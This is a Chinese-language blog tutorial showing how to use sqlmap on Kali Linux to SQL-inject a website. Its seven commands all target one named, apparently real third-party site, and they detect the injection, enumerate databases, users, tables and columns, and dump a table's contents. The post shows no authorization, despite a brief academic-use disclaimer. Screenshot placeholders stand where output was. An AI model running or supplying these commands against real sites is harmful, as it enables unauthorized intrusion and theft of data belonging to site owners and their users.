使用kali完成sql注入

使用kali完成sql注入

本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入

前期准备

1.kali虚拟机(自带sql注入所需工具)
2.能够进行注入的网站

实验步骤

1.查看是否可以sql注入
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ GET

在这里插入图片描述

2.爆库
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --dbs在这里插入图片描述

3.查看当前使用的是哪个库
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --current-db

在这里插入图片描述

4.查看当前users
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ --users

在这里插入图片描述

5.列出当前数据库所有表
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ -D bnbcom_unidatabase --tables
在这里插入图片描述

6.列出上面查出来的任意一个表的所有列
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ -D bnbcom_unidatabase -T uni_room --columns
在这里插入图片描述

7.爆字段内容
sqlmap -u ‘http://www.slmm90.com.tw/news.php?id=408%20’ -D bnbcom_unidatabase -T uni_room --dump

在这里插入图片描述

版权声明:本文为pray030原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。